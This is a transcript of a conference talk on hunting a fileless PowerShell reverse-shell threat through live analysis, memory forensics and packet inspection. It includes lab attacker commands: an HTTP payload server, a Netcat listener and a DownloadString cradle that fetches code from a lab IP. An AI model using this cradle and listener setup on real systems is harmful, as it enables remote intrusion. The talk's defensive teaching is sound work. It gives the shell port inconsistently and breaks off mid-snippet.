Hello everyone, I am glad to be part of DEF CON again this year. Blue Team Village, thank you very much for the opportunity, and a special thanks to all of you for making time to attend this session, Hunt the Beast in the Shadow. Before we dive into the main topic, let me quickly tell you who is speaking. I am Meisam Eslahi, a cybersecurity practitioner and consultant. At the moment I am a Senior Director with EGS, EC-Council Global Services, for both reactive and proactive cybersecurity. I am also a mentor with Blue Team Village and one of the contributors to the MITRE D3FEND project. In my free time I do research and practical experiments and share my findings in the form of write-ups on my blog at cybermeisam.medium.com, or in shorter form on a daily basis on LinkedIn and Twitter. I would be more than happy to connect with you and to have you in my professional network. So here is the agenda for today. We are going to have a brief discussion about reactive cybersecurity, a little bit about its challenges, and why we need proactive cybersecurity in parallel. We will continue with an explanation of the fileless threat that we are going to hunt in this trilogy with three different methods: system live analysis, memory forensics, and network packet investigation. But before the hunt begins, reactive cybersecurity. In this approach, we spend heavily on technology, deploy it in a multi-layer fashion, assume protection, and keep monitoring. In case a cybersecurity incident happens, which most probably will, we trigger incident response, followed by a digital forensic investigation. Nothing is wrong with this approach; in fact, reactive cybersecurity is an integral part of our strategy. But according to IBM, only about 80% of cyber threats and attacks can be successfully detected by automated cybersecurity solutions and SOC Tier 1 and Tier 2 analysts.
The remaining 20% are those sophisticated attacks that can evade standard detections, bypass our cybersecurity solutions, and remain undetected in our environment for up to 280 days, which is quite a long time for an attacker to play around in our environment and cause serious damage. One of those sophisticated attacks is the fileless threat. When we talk about fileless threats, it doesn't mean there is no file activity involved or that no trace remains on the hard disk. Yes, there is a rare type of fileless threat that operates entirely in memory and never touches the hard disk, but such threats are rare and very difficult to implement. In general, a fileless threat either needs a file to operate or indirectly uses a file on the hard disk during part of its life cycle. Then why call it fileless? Because the malicious part of the activity is conducted only in memory; the malicious components are memory-based, not file-based. That's why we call them fileless threats, and that's why they can bypass our automated cybersecurity. So having reactive cybersecurity in our organization is a must, but it would be a great idea to add a proactive approach in parallel. In proactive cybersecurity, unlike the reactive, we assume a breach. We assume that despite the fact that we spend a lot of time, energy, and money on our technology, fine-tuning our processes, and educating our staff, a cybersecurity incident can still occur. As explained by the Swiss cheese model, a tiny crack, like a misconfiguration, a human error, a scope gap, or a blind spot, in each layer of our cybersecurity model could give an attacker a way to walk into our environment and conquer our digital wonderland. That's why there is no harm in assuming a breach. Keep hunting, fix, improve, and prevent where possible.
Proactive cybersecurity helps us to identify unknowns and issues, discover new attack surfaces, manage risk effectively, and respond rapidly to threats. Most importantly, it minimizes cyber dwell time: the earlier we detect an issue, the faster and better we may be able to respond. During this process we can, of course, enhance our capability and maturity level, and reducing the overall risk and damage is the main advantage of proactive cybersecurity. There are a lot of proactive cybersecurity practices, such as security awareness for staff and cyber drills to fine-tune our processes, and one of the technical ones is threat hunting. Threat hunting is a human-driven practice to iteratively look for any sign of malicious activity in our environment, in the past and present. In threat hunting, we have two types in general: structured and unstructured. In this presentation we are focusing on structured threat hunting, which works around an educated guess, or a hypothesis. The hypothesis is the initial idea that tells us what we should look for, how to look for it, and a set of steps a threat hunter can follow to detect a potential cyber attack. The hypothesis can be formed around an entity, for example, high-value assets or high-risk users. Normally we focus mainly on the assets, but we should keep in mind that behind every asset there is a human who interacts with that asset and controls and has access to the data on it. That's why it's very important in our hypothesis to consider both high-value assets and high-risk users. It could also be intel-driven: for example, there is news about attacks happening in a particular sector, and if by chance we are in the same sector, there is a chance we will be the next target, so we can trigger a hunt in that direction.
In this presentation we are focusing on the TTP-driven approach, which is based on the attack techniques used by threat actors. In order to form our educated guess and hypothesis, we need a threat hunt loop, which is the entire life cycle of a threat hunt. It starts with an initial observation to formulate a hypothesis. To formulate the hypothesis, we can get the aid of cyber threat intelligence or the outcomes of other services: for example, if red team or blue team exercises conducted in our environment found some issues and vulnerabilities, we could assume that any of those may already have been used by attackers who are now in our environment. Then we know what we are looking for. In this presentation we focus on knowledge bases; we will talk about them shortly. Once we formulate our hypothesis, we should analyze the requirements, including the sources of data, the tools we need, and the techniques we need to collect and analyze the data. Then we continue with the investigation and hunt. During the investigation and hunt, we may pivot to other data sources; we may actually use a chain of hypotheses, moving from hypothesis one to other educated guesses. When we come to the findings, we should definitely record and validate them. Three outcomes may occur. If a finding is confirmed, we should trigger incident response and digital forensics, conduct a compromise assessment for the rest of the assets in our network, pursue enrichment and automation, and, most importantly, develop new detection content for the future. We don't want to manually hunt each and every time for similar cases; things should be automated once they are known. A finding could instead be rejected or inconclusive. In the case of a rejected finding, it doesn't mean that we should have peace of mind.
Maybe this hypothesis is rejected and we need another, more advanced hypothesis to look at another data source, and so on. In the case of an inconclusive finding, it may be because we have an immature hypothesis that we need to rework, or because we used the wrong data source or inappropriate tools. Regardless of where we are in the loop, we should always review, improve, document, and update everything. So let's use this threat hunt loop to hunt a fileless threat. There is an excellent fileless script written by Daniel Lowrie that enables us to demonstrate some fileless threat activities and how to hunt them. If you are keen to know more and see a step-by-step implementation, you can follow his YouTube channel; the script is also available on his GitHub page. You can easily download it and execute it in your test environment to sharpen your skills. The life cycle of this attack starts with a fake update script which somehow gets onto the victim machine. How that happened is not the point here, because we assume a breach: we assume an attacker used any of many techniques, such as social engineering or a specific vulnerability, to drop that file on a victim machine and convince the user to click on it. Once the user executes the script, it pretends that some update-related activity is ongoing, but in fact it connects to a server which hosts a secondary malicious script, downloads it, executes it directly in memory without touching the hard disk, and then gives the attacker a reverse TCP shell and remote access. Let's have a quick view. Here I set up a simple HTTP server on Kali and then run my Netcat listener on port 443. I execute the update script. As you can see, it shows that some update is going on, but in fact it is downloading the other scripts, running them in memory, and giving us remote access. I ran this in three different scenarios. For the Windows live analysis,
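For reference, the attacker side of the demo can be sketched roughly as below. This is a lab-only sketch; the ports match what was shown in the demo, but your lab values may differ.

```shell
# Attacker machine (Kali), lab use only.
# Serve the second-stage scripts over HTTP from the current directory:
python3 -m http.server 8000

# In a second terminal, start a Netcat listener for the reverse TCP shell:
nc -lvnp 443
```

Once the fake update script runs on the victim, the second stage is fetched from the HTTP server and the shell calls back to the listener.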
I use Windows 11 as the infected victim machine, and I am going to use Sysinternals and built-in commands to hunt. For memory forensics, I use Windows 10. Why not 11? That is what we will discuss at the end of this presentation. I will use the Volatility framework, bulk_extractor, and strings to hunt in memory. For the network packet investigation, again I use Windows 11, and I'm going to use Wireshark, TShark, tcpdump, and TShark's object extraction features. Kindly note that I'm not whitelisting any tools; these are simply the tools I feel comfortable with, and of course all of them are free and open source. To generate the hypotheses, we are using three different knowledge bases by MITRE: MITRE ATT&CK, MITRE D3FEND, and the Cyber Analytics Repository. Let the hunt begin. This type of analysis is a hunt we can't really refuse, and it simply refers to the technique in which a hunter collects data from a running system, which may give us a better understanding of ongoing events compared to dead-box forensics or forensic image analysis. There is a wide variety of information to be collected: system information and configuration; users, groups, and privileges; installed applications and running services; processes, DLLs, and handles; network and internet-related data; and of course files and scripts. Because of the time limit, we are not going to cover all of them here, but I have an ongoing series on system live forensics on my blog, cybermeisam.medium.com; feel free to refer to that for more advanced write-ups about system live analysis. In this presentation, we are only going to focus on three sources of data: processes and handles, network connections, and files and scripts.
I'm going to start with three simple steps that work for me in most cases for an initial educated guess and hypothesis: collecting the list of running processes, that is, the processes running at that particular time on our live system; the active network connections, especially the established TCP ones; and the process-to-port mapping, to identify which process is behind a particular network connection. To get a list of the processes, there are a lot of tools, like the normal Task Manager or tasklist, which is a built-in Windows command. However, I prefer to use pslist from Microsoft Sysinternals because it gives us the hierarchy of the processes. Using the -t switch with pslist helps us do process lineage analysis, or process tree analysis, which is suggested by the different knowledge bases. We try to understand who the parent of each process is, who the siblings are, and gather information on how a process was initiated, which may help us determine whether a process is malicious or normal. Running pslist on the victim machine shows us two instances of PowerShell, which is already alarming, executed under cmd as the parent. This immediately triggers one of the Cyber Analytics Repository detection cases, PowerShell execution, which suggests that a hunter should look for any instance of PowerShell that was not launched interactively. Interactively technically means that a user, let's say a network admin, directly executes PowerShell, in which case the parent should be explorer. As we can see here, the parent is cmd, which means it was not interactively executed by a user. The good thing about the MITRE analytics is that for most detection cases they provide generic pseudocode from which we can easily understand how to implement the detection rule in our automated cybersecurity solutions.
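As a sketch, the process tree step looks like this; pslist is run from attached external storage (the E:\tools path is my layout, not a requirement), and the tree below is illustrative of what we saw:

```shell
:: Victim machine (Windows). pslist.exe runs from the attached external storage.
:: -t prints the process tree so parent/child relationships are visible.
E:\tools\pslist.exe -t

:: Illustrative shape of the suspicious branch:
::   cmd.exe
::     powershell.exe
::     powershell.exe
```

PowerShell hanging off cmd rather than explorer is exactly the non-interactive launch pattern the CAR detection case describes.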
Another detection case related to processes and the process list is common Windows process names being misused by attackers to hide their malicious activities: the attacker uses a standard name to hide what they are doing. So as a first hunt-and-detect step, let's check whether these processes are fake or real, standard Windows processes. Again, the MITRE ATT&CK knowledge base gives us a list of detection methods for checking whether these processes are standard. They suggest, for example, that files with known names but in unusual locations are suspect, as are file hashes that do not match what they are supposed to be. Out of this long list, I'm using one of them: match legitimate name or location. A simple wmic process query helps me get the process ID plus the executable path, and to keep a narrow scope I limited the output to only those four processes. As we can see here, they seem legitimate, because they are executing from the standard Windows System32 folder. Let's switch to the hash values. The Get-FileHash function of PowerShell helps us generate the hash values of those four processes. These hash values can be correlated via our knowledge base, our internal resources, or the community, or simply submitted to publicly available resources like VirusTotal. In this case, I submitted the conhost hash value to VirusTotal, which confirmed it to be a legitimate conhost. Still no peace of mind, though: even though these processes are legitimate and standard, there is still a chance that they are being misused by the attacker. That's why we go to another useful detection case, this one by MITRE D3FEND, which is file access pattern analysis.
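A minimal sketch of the path and hash checks; the PIDs and the conhost path are illustrative placeholders, so substitute the values from your own process list:

```shell
:: Map PIDs to executable paths with built-in WMIC (PIDs are placeholders):
wmic process where "ProcessId=9392 or ProcessId=9460" get ProcessId,Name,ExecutablePath

:: Hash an on-disk image with PowerShell's Get-FileHash for correlation
:: against internal resources or VirusTotal:
powershell -Command "Get-FileHash -Algorithm SHA256 C:\Windows\System32\conhost.exe"
```

A path outside System32 or a hash mismatch at this step would satisfy the "match legitimate name or location" detection case on its own.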
They provide a very handy example of how to detect wipers and ransomware: if a process has access to multiple file types, or to many files located in multiple locations and directories, it could be an indicator of a wiper or ransomware. Another handy Sysinternals tool, Handle, helps us gain information about the files and resources accessed by a particular process. I'm using the plain form first, without any switch, against cmd, and it shows that it has a handle to a file located under the CyberMeisam user's Downloads folder. Obviously so, because as we remember, our dropper executed from that exact path. I continue with the -a switch, because it gives more comprehensive information, like the ports, registry keys, threads, and all the resources accessed by a particular process, in this case these four instances. And surprisingly, I have seen a lot of indicators. All of them have access to the CyberMeisam Downloads folder. We can see that PowerShell has a handle to, which technically means access to, crypt32.dll, which is used by processes when they want encryption and decryption functionality. We can also see some information related to the network configuration and TCP/IP, which indicates that this PowerShell somehow has something to do with the network. Taken together, all of these are alarming. Let's continue with another useful one, which is command and scripting. The MITRE ATT&CK knowledge base suggests that we should monitor the command-line arguments of scripts executed by any process; those commands may give us some information about what is going on and what each process is trying to do. A simple wmic process get enables us to get the process ID, name, and command line, again limited to only those four.
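The handle enumeration step above can be sketched like this; the E:\tools path is my layout, and filtering by image name rather than PID is just one way to scope the output:

```shell
:: File handles held by cmd (plain form, Sysinternals Handle):
E:\tools\handle.exe -p cmd.exe

:: -a dumps all handle types: files, registry keys, threads, ports,
:: and other processes accessed by each PowerShell instance:
E:\tools\handle.exe -a -p powershell.exe
```

Handles to crypt32.dll and TCP/IP-related objects in this output are what pointed us toward encoding activity and network use.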
The command executed by cmd is interesting, because it shows a batch file with the .cmd extension being executed from a Downloads folder. The Downloads folder alone is an alarming indicator, because it suggests that something may have been downloaded by the user into the Downloads folder and executed from there. There are other interesting findings that I tried to match against the MITRE knowledge bases as much as possible. For example, the Cyber Analytics Repository says that unusually long command-line strings are often an indicator of malware activity; however, they don't define how long "long" should be. But in this case, as you can see, we have a very long one that indicates the use of DownloadString, a PowerShell function used to download and execute scripts directly in memory without touching a file. And in this case, as you can see, win security update is a script that was downloaded using that same PowerShell technique and function. Another thing is hidden artifacts: attackers normally try to hide their activity, and in this case you can see the use of -NoP and -WindowStyle Hidden to hide the windows related to the script running on the victim machine. So let's focus on the downloaded file, because this file was downloaded and run directly in memory. The first thing we try to understand about this file, the script with the .cmd extension, is what this file is and who owns it. This is what we call file and resource ownership. We can easily navigate to the Downloads folder and use dir with the /q switch to show the username behind the file. Here we can see the update script is still there and is owned by a user called CyberMeisam. If possible, we should go and check the content of the file. In this case, you can see the command line which was executed, matching what we observed in the findings: it shows again the download of win security update. So what is this win security update doing?
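The command-line and ownership checks above can be sketched as follows; the Downloads path reflects the demo machine's user name:

```shell
:: Command lines per process, via built-in WMIC:
wmic process where "Name='powershell.exe' or Name='cmd.exe'" get ProcessId,Name,CommandLine

:: File ownership in the Downloads folder; /q adds the owner column:
cd C:\Users\CyberMeisam\Downloads
dir /q

:: If appropriate, inspect the dropper's content directly:
type update_script.cmd
```

A long command line containing DownloadString together with -NoP and -WindowStyle Hidden is the combination of indicators discussed above.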
If there is a possibility, we could refer to the same URL or IP and download the script onto an isolated system for further analysis, but that is not always possible, and even when it is, it may alert the attacker: if we download from another location, we technically tell the attacker, hey buddy, we are downloading your script and we are going to analyze it. In this case, we grab win security update, check the content, and see encoded information. Now it makes sense why PowerShell had access to crypt32.dll: it is doing some sort of encoding and decoding of data. This is simple Base64. We can use echo with base64 decoding in Kali Linux to decode the data, which reveals another attempt to download secondary scripts. A view of r1 shows that a TCP socket client is used to establish a TCP connection to a potential attacker machine via port 443, which is a reverse shell. When we talk about a reverse shell, it means network activity is there. MITRE ATT&CK T1049 suggests that attackers, upon initial access to the victim machine, normally try to discover network connections to evaluate the possibility of finding other vulnerable or connected systems. If the attacker can use this technique for bad intentions, we as hunters can use it for good: we can list the network connections to see what is going on. A simple netstat -ano helps us list all the network connections, especially the established TCP ones. As we can see here, the network connection is still there, established by process ID 9392 to the attacker machine. This is where we need a simple process-to-port mapping: I use tasklist to find the name behind process ID 9392, which is PowerShell.
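The Base64 decode step can be reproduced with the base64 utility on Kali. The payload below is an illustrative stand-in for the real encoded string, with a placeholder IP, round-tripped so the decode is reproducible:

```shell
# Illustrative only: encode a DownloadString-style one-liner, then decode it
# the same way we decoded the strings embedded in the real script.
payload="IEX (New-Object Net.WebClient).DownloadString('http://192.168.182.145:8000/a1')"
encoded=$(printf '%s' "$payload" | base64 -w0)

# Decoding reveals the download attempt hidden inside the Base64 blob:
printf '%s\n' "$encoded" | base64 -d
```

In the real sample, this is the step that exposed the secondary script downloads and, in r1, the reverse TCP connection.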
That technically means we have a script which runs PowerShell, and that PowerShell gives a reverse TCP shell to the attacker. A confirmed case: this is the time we can start generating IOCs and updating our automated tools. As it is well said by my friend Josh, threat hunting does not use IOCs, it makes them. Now that we know the rules, let's use a free tool, one of my favorites, Process Explorer, which can be used to do all this wonderful analysis together. Just keep in mind that we should not install anything on the victim machine, and we should avoid copying or installing anything as much as possible. Technically, we should have external storage, copy the files onto it, attach it to the live system, and then execute the applications and scripts from the external storage. Upon execution of Process Explorer, we can immediately see a very nice view of the process hierarchy that again shows our cmd and the PowerShell instances. If you just move your cursor slowly over each process, you can see the command line executed by that particular process. And if we right-click on a process and go to Properties, we get tabs with a lot of fantastic information. For example, the Image tab gives us the build time, the path, the command line executed, and the current directory, and most interestingly, the TCP/IP tab shows us the connections established by that process. So as you can see, system live analysis gives us a very good point of view on what is happening in the system. However, there are a lot of challenges, which we will discuss in detail in the last slides. Just to name one: when we deal with Windows live analysis, or system live analysis, there is always a chance of unintentional changes, which is really risky if we alter the digital forensic artifacts or even the system state.
That's why we are now going to focus on memory forensics, which gives us more or less the same information, but in a much safer way. We are in the second part of our threat hunt trilogy: memory forensics. Let's dive into the past. The first step in threat hunting via memory forensics is to create a forensic image of the memory, simply a bit-by-bit copy of the memory of the machine under investigation. Instead of talking about the tools, let's talk about a few rules. As we discussed earlier, we should not copy or install anything on the victim machine, because forensically we should avoid any intentional or unintentional changes to the system state or the digital artifacts during a threat hunt, root cause analysis, threat detection, or digital forensics. We need a forensically clean external storage device onto which we copy all the necessary files and applications; we attach it to the victim machine, execute the tools from there, and save the results onto the external storage as well. So I created a forensic image of the memory of the infected system and copied it to my investigation system, which is a Kali Linux machine equipped with the latest version of the Volatility framework, Volatility 3 at this particular moment. We can easily refer to the help of the Volatility framework to get a list of all the currently available plugins for retrieving information from memory taken from a Windows operating system. They may look a little limited at the moment because Volatility 3 is still new, and it takes a little time for the community to improve it, make it more mature, and develop more profiles and plugins. Let's continue with the first step in detection, which is similar to what we did for the system live analysis: process lineage analysis. The Volatility plugin windows.pstree gives us the opportunity to list the processes along with their parents and siblings.
As we expected, we can see two instances of PowerShell running under cmd. If you noticed that the process IDs here are different from what we observed during the system live analysis, that is simply because I ran these two exercises on two different testbeds at two different times. So again, PowerShell was not interactively executed by a user; instead it runs under a cmd process. Let's have a view of the handles to see whether each of these processes accesses any file, registry key, or other process. In this case, I used the Volatility windows.handles plugin and limited the output to only those three suspicious processes, the two instances of PowerShell and the cmd, and I used grep to match only File, Key, and Process entries. As we can see here, there is file access by the cmd process to a file located under the CyberMeisam user's Downloads folder; again, access to a file in the Downloads folder is very suspicious. And we can see here a handle created by cmd to another process, 9460, which refers to one of the PowerShell instances. Getting the handles for these two PowerShell instances again indicates access to crypt32.dll, which is used for decoding, encoding, and encryption, and to some network and TCP/IP related settings and information, which indicates that this PowerShell is doing something over the network. The command-line information is pretty straightforward to extract from the memory image: we have a built-in plugin called windows.cmdline. Again, we can limit it to those three suspicious processes, and we can clearly see each process ID followed by the command executed by that particular process. Here we can see again that cmd executed update_script, a batch file with the .cmd extension.
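Assuming the image was saved as memdump.raw and Volatility 3 is installed as vol, the steps above can be sketched as below; PID 9460 is from my run, and the other PIDs come from the pstree output:

```shell
# Process tree: the memory-side process lineage analysis.
vol -f memdump.raw windows.pstree

# Handles for a suspicious process, filtered to File/Key/Process entries.
# Repeat with the cmd PID and the second PowerShell PID from pstree.
vol -f memdump.raw windows.handles --pid 9460 | grep -E 'File|Key|Process'

# Command line recorded in memory for that process:
vol -f memdump.raw windows.cmdline --pid 9460
```

This gives the same lineage, handle, and command-line picture as the live analysis, without touching the running system at all.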
And one of the PowerShell instances used DownloadString to download a secondary, potentially malicious script from this particular IP via port 8000; DownloadString gives this PowerShell the opportunity to download directly into memory and execute from there without touching the hard disk. At the moment we are using Volatility, but besides that I would like to introduce two other handy techniques. One is one of my favorite tools, bulk_extractor, an open-source tool that can scan any hard disk image or memory image and extract a wide variety of data. You can easily refer to the official GitHub page to check which data types are available to extract. Here I just ran it against our memory image and extracted various data. Because we are aware of this suspicious IP, I used a simple grep to look for anything matching it among all the data derived by bulk_extractor, and we can see here another three URLs, which are another three scripts downloaded and accessed from the same IP. Apart from bulk_extractor, we can use the built-in strings command: we can cat the memory file and then use strings and grep to look for any string in the memory image that matches our IP. Again, here we can see the indicators of the download of three additional scripts. We are not going to repeat the same process we did for the system live analysis. If possible, we download all these scripts onto an isolated machine for further investigation. If you remember, we discussed two challenges: the scripts may not be available at this point in time, and even if they are available, downloading them may alert the attacker. Another real challenge in memory forensics is that this memory image was taken in the past, which means that at the moment we are analyzing it, those links may no longer be accessible, or may not even exist.
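The two extra techniques can be sketched as follows; memdump.raw is my assumed image name and the IP is a placeholder for the suspicious address:

```shell
# Carve URLs, IPs, domains, and other artifacts from the memory image:
bulk_extractor -o bulk_out memdump.raw

# Search the carved artifacts for the suspicious IP:
grep -r '192.168.182.145' bulk_out/

# Same idea with the built-in strings command, straight off the image:
strings memdump.raw | grep '192.168.182.145'
```

Both approaches surfaced the URLs of the additional scripts pulled from the same host.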
But again, threat hunting is all about evaluating and exploring different opportunities. If possible, we download all the scripts into an isolated environment and inspect their contents for further investigation. Just to recall: win security update is the one that contains two different Base64-encoded strings; when we decoded them, it was revealed that it downloads another two files, a1 and r1, and r1 is the one that makes the reverse TCP connection. When a reverse TCP connection is involved, the last step would be checking the established network connections, which can be done with the netstat plugin of Volatility 3. The good thing about this plugin is that we don't need to do the process-to-port mapping individually, because once we obtain the data it shows the owner of each established connection. In this case, we can see an active TCP connection to the suspicious IP, made by a PowerShell instance. So now we can confirm that our script downloads additional scripts, executes them from memory, and gives reverse shell access to the potential attacker remotely. In network packet investigation, we may deal with a huge volume of data; that's why I call it hunting in the ocean. Both MITRE D3FEND and MITRE ATT&CK give us a list of techniques for finding suspicious and malicious activity in network traffic by analyzing network connection creation, content, and flow. But in general, all of the techniques talk about how we should look for uncommon, unknown, abnormal, and untrusted IPs, ports, and communications. In this section I'm using Wireshark to open a pcap file of traffic captured from the host infected by the fileless threat. In the Statistics menu we can view the conversations and the list of endpoints.
Technically, the Wireshark statistics give us a good idea about what is happening in the network in terms of the protocol hierarchy, which we will cover shortly, the packet lengths, and the endpoints and conversations. Simply put, Endpoints lists all the endpoints and IP addresses that showed some sort of activity during the capture, while Conversations specifically shows the packets sent and received between two endpoints. There are a few challenges in dealing with this kind of data. If we don't have a baseline for what is standard and normal in our environment, it can be difficult to define the uncommon, the unknown, and the untrusted. Sometimes, even if we have the baseline, we may be dealing with a large volume of data with high diversity, a dynamic nature, and complexity, which makes life a little hard for a threat hunter, and poor data management and analysis could lead our threat hunt to failure. That's why, apart from data collection, proper data classification, filtering, and unwanted-data reduction play an important role. For example, here I just used a very simple display filter to keep only the traffic to or from the victim machine, which in this case is 192.168.182.140. This simple filter effectively removed 20% of the unwanted data, and when we are talking about a huge volume of data, 20% can be a time saver and even a life saver. The MITRE D3FEND Network Traffic Community Deviation technique suggests that once we collect network and packet data, we should look for any deviation from the routine of our network. Again, if we don't have the baseline, we cannot do much. So in this example, I try to simply understand who is who: I used a very simple tcpdump command to extract all the IP addresses present in the packet capture file, and then I wrote a very simple script to run whois on the public IPs.
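A sketch of that who-is-who step. The pipeline extracts IPv4 addresses from tcpdump's text output; here it runs against a sample line so the extraction itself is reproducible, and the whois loop is the simple script mentioned above (it needs network access, and the grep'd field names vary by registry):

```shell
# The sample stands in for `tcpdump -nn -r capture.pcap` output:
sample="12:00:01 IP 192.168.182.140.49812 > 93.184.216.34.443: Flags [S]"
printf '%s\n' "$sample" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u

# Against a real capture, then whois each public IP:
# tcpdump -nn -r capture.pcap | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u \
#   | while read ip; do whois "$ip" | grep -iE 'OrgName|org-name'; done
```

The result is the list of IPs in the capture paired with their owning organizations, which is the starting point for spotting the untrusted ones.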
So technically we can have the list of the IPs present in that pcap file plus the names of the owning organizations. In this example everything looks normal, but we should keep in mind that not all knowns are good, because a legitimate service may be abused by an attacker to conduct malicious activities. It is always good to validate the findings against IP reputation systems, known IOCs, and threat intel feeds, or against a few extra factors that we are going to explain now. "Top protocols" simply means the protocols used the most in the conversations on the network; "top hosts" means the hosts that show the most activity; and accordingly, "top conversations" are the pairs of hosts that talk to each other the most compared to the others. The two interesting ones are top listeners and top talkers. Top listeners are those who receive more data than they send, and top talkers are those who send more data than they receive. Let's have a quick example with these terms. I limited our packets to only the IP address of the victim machine. Going to Statistics, the Endpoints tab, IPv4, sorted by bytes, we can see the list of the top hosts that showed the most activity at the time we captured the traffic. As we can see, there is one private IP that belongs to the same network as our victim machine, and it appears in the top hosts list. Going to Statistics and Conversations and repeating the same sort by bytes, surprisingly we have the same IP appearing in the top conversations. That means it shows some of the highest activity in the network, and it has one of the highest rates of conversation with our victim. I then used tcpdump again to extract the list of top talkers in our network, and our suspected IP appears there again, meaning it was one of the top talkers, communicating the most with the endpoints in the network. But we may need more details to validate the finding, because the devil is in the details.
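The top-talker and top-listener definitions above can be made concrete with a small sketch over simplified flow records. This is an illustration of the bookkeeping, not a packet parser; the flows are made-up sample data.

```python
# Sketch: compute top talkers (send more than they receive) and top
# listeners (receive more than they send) from (src, dst, bytes) records.
from collections import defaultdict

def talkers_and_listeners(flows):
    """flows: iterable of (src, dst, byte_count). Returns (talkers, listeners)."""
    sent, recv = defaultdict(int), defaultdict(int)
    for src, dst, nbytes in flows:
        sent[src] += nbytes
        recv[dst] += nbytes
    hosts = set(sent) | set(recv)
    talkers = sorted((h for h in hosts if sent[h] > recv[h]),
                     key=lambda h: sent[h] - recv[h], reverse=True)
    listeners = sorted((h for h in hosts if recv[h] > sent[h]),
                       key=lambda h: recv[h] - sent[h], reverse=True)
    return talkers, listeners

flows = [("192.168.182.1", "192.168.182.140", 90_000),
         ("192.168.182.140", "192.168.182.1", 10_000),
         ("192.168.182.140", "8.8.8.8", 500)]
talkers, listeners = talkers_and_listeners(flows)
print(talkers[0], listeners[0])
```

In the sample, the suspect peer dominates the sent column while the victim dominates the received column, exactly the asymmetry the statistics tabs surface.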
Even though this IP is among the top talkers, when we dig in and go for further investigation, specifically into the conversation between this IP and our victim, we notice that this IP received more data than it sent to the victim machine. The MITRE ATT&CK data source DS0029, Network Traffic, suggests monitoring network data for uncommon data flows; for example, a client sending significantly more data than it receives from the server, which is the case here. Let's focus on that particular conversation and extract the protocols mainly used in it. We apply that specific conversation as a filter to limit the data to only that conversation, so the traffic is now filtered on the victim IP and the suspect IP. Again, from the Statistics menu we can go to the Protocol Hierarchy, and based on what we observe here, TCP is involved, we have some HTTP traffic, and we have some raw data. MITRE suggests focusing on the application-layer protocols, because web protocols are widely used by cyber attackers to hide their activity among normal web traffic. On the left side, I added one more filter, http, to not only limit the findings to this conversation but also show only the HTTP-related traffic, since we have seen HTTP in the protocol hierarchy. Interestingly, we can see a GET method used to download a few files. We can focus on these files downloaded via HTTP GET: right-clicking on any of them and following the stream, either the TCP or the HTTP stream, gives us the opportunity to see the content. In this case, we use Follow HTTP Stream to see the content of win-security-update, which I believe is familiar to you and rings a bell, because this is the same Base64-encoded data.
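The DS0029-style "uncommon data flow" check boils down to a directional byte ratio. Here is a minimal sketch of that idea; the threshold of 5x is an arbitrary illustrative choice, not a MITRE-specified value.

```python
# Sketch: flag a conversation as an uncommon data flow when one peer
# carries disproportionately more bytes than the other direction.
def uncommon_flow(bytes_a_to_b, bytes_b_to_a, ratio=5.0):
    """True if one direction moves `ratio` times more data than the other."""
    low, high = sorted((bytes_a_to_b, bytes_b_to_a))
    if low == 0:
        return high > 0  # entirely one-sided transfer
    return high / low >= ratio

print(uncommon_flow(1_200_000, 40_000))  # True: lopsided transfer
print(uncommon_flow(52_000, 48_000))     # False: roughly symmetric
```

In practice the threshold should come from the environment's baseline; without one, a fixed ratio is only a starting heuristic.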
When we see a few files involved in the traffic, it immediately triggers the File Carving detection method from MITRE D3FEND, which says we should identify and extract files from network application protocols. In this filter, I focus only on the files and the hosts for that particular conversation. Here I demonstrate a tshark example that helps us extract all the Host fields from the request headers for the entire conversation within a packet capture file. Let's get back to file carving: if we want to extract those files from the captured network traffic, we have a few options, and I have listed two. One is a built-in option of Wireshark, Export Objects: we can select the conversation, go to the File menu, and choose Export Objects to see the list of objects extracted from that conversation, then select and save them all. Another interesting tool is the tshark extractor, again an open-source tool (you know I'm a big fan of open-source and free tools). If we run the tshark extractor against our pcap file, it automatically extracts all the potential files present in that conversation; however, they are saved based on the stream number. A simple tshark command helps us find the TCP stream index for the HTTP GET methods. For example, here I have stream index 22 for win-security-update, 23 for A1, and 24 for R1. Let's take a look at R1, which has TCP stream index 24. I refer to the findings of the tshark extractor and open HTTP stream 24, and if you remember the content from the previous investigations, we have the evidence of establishing a reverse TCP connection via port 4443, which, according to another piece of MITRE knowledge-base information, is a port commonly used by attackers to hide their activities. So let's narrow down our view this time to TCP port 4443 for the same conversation.
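Matching the carved files back to their stream numbers is just a small mapping step. The sketch below assumes tshark-style output from a field extraction such as `tshark -r capture.pcap -Y 'http.request.method == "GET"' -T fields -e tcp.stream -e http.request.uri`; the sample lines are illustrative stand-ins for that output.

```python
# Sketch: map requested URIs to TCP stream indices, so carved files
# saved by stream number can be tied back to what was downloaded.
def uri_to_stream(tshark_lines):
    """Parse 'stream<TAB>uri' lines into a {uri: stream_index} mapping."""
    mapping = {}
    for line in tshark_lines:
        stream, uri = line.split("\t")
        mapping[uri] = int(stream)
    return mapping

lines = ["22\t/win-security-update.ps1", "23\t/A1.ps1", "24\t/R1.ps1"]
print(uri_to_stream(lines))
```

With this table in hand, opening "stream 24" immediately resolves to the R1 download rather than an anonymous carved blob. (The `.ps1` filenames here are assumed for illustration.)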
We can see that the first few rows are the typical standard three-way TCP handshake, followed by some PSH/ACK and ACK packets, which indicate some data transfer. Based on MITRE again, for network traffic we should analyze the traffic content when it is not encrypted, when the encryption is such that we can decrypt it, or when it is plain text, as in our case. Right-clicking on any of these data packets and choosing Follow TCP Stream shows us the commands executed by the adversary, extracted again via Follow TCP Stream. We can see a few commands executed that indicate system information discovery. Normally, attackers perform system information discovery upon initial access to get a better understanding of the current state of the machine, to see whether there is any chance for privilege escalation, and to identify other vulnerable connections and resources in the network for lateral movement. System live analysis gives us a better understanding of ongoing events, because we are doing the threat hunting while the system is still running. In some cases, making forensic images is difficult or challenging, like when we are dealing with a huge volume of storage, or sometimes, based on the SLA when we are renting services from vendors, we may not even have the opportunity to touch their storage; there, system live analysis can be a good option. Another example is when sophisticated attacks may not leave any traces on the hard disk; system live analysis, again, can be a big help. However, there are a few risks associated with this technique. For example, the risk of unintentional changes is always there, because we are dealing interactively with a running system. If, by chance, the attack is still ongoing at the same time as the threat hunting activities, we may have a conflict and we may alert the attacker. And most importantly, the procedure may not be repeatable, because the state of the system keeps changing.
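Spotting system-information-discovery commands in a followed stream can be partially automated. A minimal sketch, assuming the stream text has already been split into command lines; the keyword list is a small illustrative sample of tools associated with ATT&CK discovery techniques such as T1082, not an exhaustive set.

```python
# Sketch: scan commands recovered from a followed TCP stream for typical
# system-information-discovery tooling (e.g., ATT&CK T1082).
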